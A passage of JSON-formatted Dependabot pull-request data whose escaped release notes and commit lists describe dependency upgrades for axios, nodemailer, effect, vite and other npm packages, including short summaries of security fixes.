href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eChangelog:\u003c/strong\u003e Updated \u003ccode\u003eCHANGELOG.md\u003c/code\u003e with v1.15.1 release notes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.15.1...v1.15.2\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003chr /\u003e\n\u003ch2\u003ev1.15.1 - April 19, 2026\u003c/h2\u003e\n\u003cp\u003eThis release ships a coordinated set of security hardening fixes across headers, body/redirect limits, multipart handling, and XSRF/prototype-pollution vectors, alongside a broad sweep of bug fixes, test migrations, and threat-model documentation updates.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eHeader Injection Hardening:\u003c/strong\u003e Tightened validation and sanitisation across request header construction to close the header-injection attack surface. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10749\"\u003e#10749\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eCRLF Stripping in Multipart Headers:\u003c/strong\u003e Correctly strips CR/LF from multipart header values to prevent injection via field names and filenames. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10758\"\u003e#10758\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003ePrototype Pollution / Auth Bypass:\u003c/strong\u003e Replaced unsafe \u003ccode\u003ein\u003c/code\u003e checks with \u003ccode\u003ehasOwnProperty\u003c/code\u003e to prevent authentication bypass via prototype pollution on config objects, with additional regression tests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10761\"\u003e#10761\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10760\"\u003e#10760\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003ewithXSRFToken\u003c/code\u003e Truthy Bypass:\u003c/strong\u003e Short-circuits on any truthy non-boolean value, so an ambiguous config no longer silently leaks the XSRF token cross-origin. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003emaxBodyLength\u003c/code\u003e With Zero Redirects:\u003c/strong\u003e Enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e even when \u003ccode\u003emaxRedirects\u003c/code\u003e is set to \u003ccode\u003e0\u003c/code\u003e, closing a bypass path for oversized request bodies. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10753\"\u003e#10753\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eStreamed Response \u003ccode\u003emaxContentLength\u003c/code\u003e Bypass:\u003c/strong\u003e Applies \u003ccode\u003emaxContentLength\u003c/code\u003e to streamed responses that previously bypassed the cap. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10754\"\u003e#10754\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eFollow-up CVE Completion:\u003c/strong\u003e Completes an earlier incomplete CVE fix to fully close the regression window. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10755\"\u003e#10755\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAI-Based Docs Translations:\u003c/strong\u003e Initial scaffold for AI-assisted translations of the documentation site. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10705\"\u003e#10705\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/582934382e4e0e0bcb679c628071a4203e93cf57\"\u003e\u003ccode\u003e5829343\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.15.2 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10789\"\u003e#10789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/4709a48fa2717ba97f43f5432d48ca4e26c2d326\"\u003e\u003ccode\u003e4709a48\u003c/code\u003e\u003c/a\u003e fix: added fix for memory leak in sockets (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/be3336014e01f9a4fc1f8aef15303cf7daaf58db\"\u003e\u003ccode\u003ebe33360\u003c/code\u003e\u003c/a\u003e chore: update changelog (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa\"\u003e\u003ccode\u003e4791514\u003c/code\u003e\u003c/a\u003e fix: more header pollutions (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/6feafcff6c2dbafe206161c5d09e38e1d36af66f\"\u003e\u003ccode\u003e6feafcf\u003c/code\u003e\u003c/a\u003e fix: socket issue (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/302e2739c602f00e323d4f3f5c79500647633a73\"\u003e\u003ccode\u003e302e273\u003c/code\u003e\u003c/a\u003e docs: update docs, add a couple actions etc (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/ac42446be51300fe214ba3c6e40cc95f34fd6871\"\u003e\u003ccode\u003eac42446\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.15.1 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10767\"\u003e#10767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/908f2206b6bfeff67236784abce85935698ac1d9\"\u003e\u003ccode\u003e908f220\u003c/code\u003e\u003c/a\u003e docs: update threatmodel (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10765\"\u003e#10765\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/f93f8155250c2e066205521eda05ae22983a1f6d\"\u003e\u003ccode\u003ef93f815\u003c/code\u003e\u003c/a\u003e docs: added docs around potential decompressions bomb (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10763\"\u003e#10763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/1728aa1b15b8857f970611fd8983c06b423fc486\"\u003e\u003ccode\u003e1728aa1\u003c/code\u003e\u003c/a\u003e fix: short-circuits on any truthy non-boolean in withXSRFToken (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v1.13.5...v1.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `nodemailer` from 7.0.11 to 8.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodemailer/nodemailer/releases\"\u003enodemailer's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.4...v8.0.5\"\u003e8.0.5\u003c/a\u003e (2026-04-07)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edecode SMTP server responses as UTF-8 at line boundary (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/95876b103e587e49583e43f88cb2c3a61556f3ac\"\u003e95876b1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esanitize CRLF in transport name option to prevent SMTP command injection (GHSA-vvjj-xcjg-gr5g) (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e\"\u003e0a43876\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.3...v8.0.4\"\u003e8.0.4\u003c/a\u003e (2026-03-25)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003esanitize envelope size to prevent SMTP command injection (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651\"\u003e2d7b971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.2...v8.0.3\"\u003e8.0.3\u003c/a\u003e (2026-03-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eclean up addressparser and fix group name fallback producing undefined (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/9d55877f8ed15a6aefd7ba76cbb6b6a6cdbcc4fd\"\u003e9d55877\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix cookie bugs, remove dead code, and improve hot-path efficiency (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/e8c8b92f46f2a82d06d49cc9a6ffc26067f68524\"\u003ee8c8b92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erefactor smtp-connection for clarity and add Node.js 6 syntax compat test (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c5b48ea61c28eabf347972f4198a12cdab226ff7\"\u003ec5b48ea\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove familySupportCache that broke DNS resolution tests (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c803d901f195a21edbb2c276b2e116564467aaaa\"\u003ec803d90\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.1...v8.0.2\"\u003e8.0.2\u003c/a\u003e (2026-03-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emerge fragmented display names with unquoted commas in addressparser (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/fe27f7fd57f7587d897274438da2f628ad0ad7d9\"\u003efe27f7f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.0...v8.0.1\"\u003e8.0.1\u003c/a\u003e (2026-02-07)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eabsorb TLS errors during socket teardown (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/7f8dde41438c66b8311e888fa5f8c518fcaba6f1\"\u003e7f8dde4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eabsorb TLS errors during socket teardown (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/381f628d55e62bb3131bd2a452fa1ce00bc48aea\"\u003e381f628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Gmail Workspace service configuration (\u003ca href=\"https://redirect.github.com/nodemailer/nodemailer/issues/1787\"\u003e#1787\u003c/a\u003e) (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/dc97ede417b3030b311771541b1f17f5ca76bcbf\"\u003edc97ede\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v7.0.13...v8.0.0\"\u003e8.0.0\u003c/a\u003e (2026-02-04)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodemailer/nodemailer/blob/master/CHANGELOG.md\"\u003enodemailer's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.4...v8.0.5\"\u003e8.0.5\u003c/a\u003e (2026-04-07)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edecode SMTP server responses as UTF-8 at line boundary (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/95876b103e587e49583e43f88cb2c3a61556f3ac\"\u003e95876b1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esanitize CRLF in transport name option to prevent SMTP command injection (GHSA-vvjj-xcjg-gr5g) (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e\"\u003e0a43876\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.3...v8.0.4\"\u003e8.0.4\u003c/a\u003e (2026-03-25)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003esanitize envelope size to prevent SMTP command injection (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651\"\u003e2d7b971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.2...v8.0.3\"\u003e8.0.3\u003c/a\u003e (2026-03-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eclean up addressparser and fix group name fallback producing undefined (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/9d55877f8ed15a6aefd7ba76cbb6b6a6cdbcc4fd\"\u003e9d55877\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix cookie bugs, remove dead code, and improve hot-path efficiency (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/e8c8b92f46f2a82d06d49cc9a6ffc26067f68524\"\u003ee8c8b92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erefactor smtp-connection for clarity and add Node.js 6 syntax compat test (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c5b48ea61c28eabf347972f4198a12cdab226ff7\"\u003ec5b48ea\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove familySupportCache that broke DNS resolution tests (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c803d901f195a21edbb2c276b2e116564467aaaa\"\u003ec803d90\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.1...v8.0.2\"\u003e8.0.2\u003c/a\u003e (2026-03-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emerge fragmented display names with unquoted commas in addressparser (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/fe27f7fd57f7587d897274438da2f628ad0ad7d9\"\u003efe27f7f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.0...v8.0.1\"\u003e8.0.1\u003c/a\u003e (2026-02-07)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eabsorb TLS errors during socket teardown (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/7f8dde41438c66b8311e888fa5f8c518fcaba6f1\"\u003e7f8dde4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eabsorb TLS errors during socket teardown (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/381f628d55e62bb3131bd2a452fa1ce00bc48aea\"\u003e381f628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Gmail Workspace service configuration (\u003ca href=\"https://redirect.github.com/nodemailer/nodemailer/issues/1787\"\u003e#1787\u003c/a\u003e) (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/dc97ede417b3030b311771541b1f17f5ca76bcbf\"\u003edc97ede\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v7.0.13...v8.0.0\"\u003e8.0.0\u003c/a\u003e (2026-02-04)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eError code 'NoAuth' renamed to 'ENOAUTH'\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csu...\n\n_Description has been truncated_","html_url":"https://github.com/stevewithington/daytona/pull/2","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/stevewithington%2Fdaytona/issues/2","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2/packages"},{"uuid":"4529231053","node_id":"PR_kwDOQ5VgK87fqYAw","number":3,"state":"open","title":"chore(deps): Bump the npm_and_yarn group across 3 directories with 12 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-27T03:25:36.000Z","updated_at":"2026-05-27T03:27:14.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): Bump","group_name":"npm_and_yarn","update_count":12,"packages":[{"name":"vite","old_version":"7.1.7","new_version":"7.3.2","repository_url":"https://github.com/vitejs/vite"},{"name":"postcss","old_version":"8.5.3","new_version":"8.5.10","repository_url":"https://github.com/postcss/postcss"},{"name":"srvx","old_version":"0.10.0","new_version":"0.11.13","repository_url":"https://github.com/h3js/srvx"},{"name":"nitropack","old_version":"2.12.6","new_version":"2.13.4","repository_url":"https://github.com/nitrojs/nitro"},{"name":"webpack-dev-server","old_version":"5.2.0","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"better-auth","old_version":"1.3.27","new_version":"1.6.2","repository_url":"https://github.com/better-auth/better-auth"},{"name":"js-cookie","old_version":"3.0.5","new_version":"3.0.7","repository_url":"https://github.com/js-cookie/js-cookie"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 2 updates in the / directory: [effect](https://github.com/Effect-TS/effect/tree/HEAD/packages/effect) and [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).\nBumps the npm_and_yarn group with 2 updates in the /repos/effect-atom directory: [effect](https://github.com/Effect-TS/effect/tree/HEAD/packages/effect) and [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).\nBumps the npm_and_yarn group with 7 updates in the /repos/tanstack-router directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `7.1.7` | `7.3.2` |\n| [postcss](https://github.com/postcss/postcss) | `8.5.3` | `8.5.10` |\n| [srvx](https://github.com/h3js/srvx) | `0.10.0` | `0.11.13` |\n| [nitropack](https://github.com/nitrojs/nitro) | `2.12.6` | `2.13.4` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.0` | `5.2.4` |\n| [better-auth](https://github.com/better-auth/better-auth/tree/HEAD/packages/better-auth) | `1.3.27` | `1.6.2` |\n| [js-cookie](https://github.com/js-cookie/js-cookie) | `3.0.5` | `3.0.7` |\n\n\nUpdates `effect` from 3.19.14 to 3.20.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Effect-TS/effect/releases\"\u003eeffect's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eeffect@3.20.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6124\"\u003e#6124\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mikearnaldi\"\u003e\u003ccode\u003e@​mikearnaldi\u003c/code\u003e\u003c/a\u003e! - Fix scheduler task draining to isolate \u003ccode\u003eAsyncLocalStorage\u003c/code\u003e across fibers.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6107\"\u003e#6107\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6088\"\u003e#6088\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003eSchema.omit\u003c/code\u003e producing wrong result on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and index signatures\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003egetIndexSignatures\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e and \u003ccode\u003egetPropertyKeyIndexedAccess\u003c/code\u003e. Previously, \u003ccode\u003eSchema.omit\u003c/code\u003e on a struct combining \u003ccode\u003eSchema.optionalWith\u003c/code\u003e (with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, etc.) and \u003ccode\u003eSchema.Record\u003c/code\u003e would silently take the wrong code path, returning a Transformation with property signatures instead of a TypeLiteral with index signatures.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6086\"\u003e#6086\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003egetPropertySignatures\u003c/code\u003e crash on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and other Transformation-producing variants\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eSchemaAST.getPropertyKeyIndexedAccess\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e. Previously, calling \u003ccode\u003egetPropertySignatures\u003c/code\u003e on a \u003ccode\u003eSchema.Struct\u003c/code\u003e containing \u003ccode\u003eSchema.optionalWith\u003c/code\u003e with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, \u003ccode\u003e{ nullable: true }\u003c/code\u003e, or similar options would throw \u003ccode\u003e\u0026quot;Unsupported schema (Transformation)\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6097\"\u003e#6097\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Fix TupleWithRest post-rest validation to check each tail index sequentially.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.19\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - add short circuit to fiber.await internals\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - build ManagedRuntime synchronously if possible\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6081\"\u003e#6081\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - fix semaphore race condition where permits could be leaked\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.18\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6062\"\u003e#6062\u003c/a\u003e \u003ca 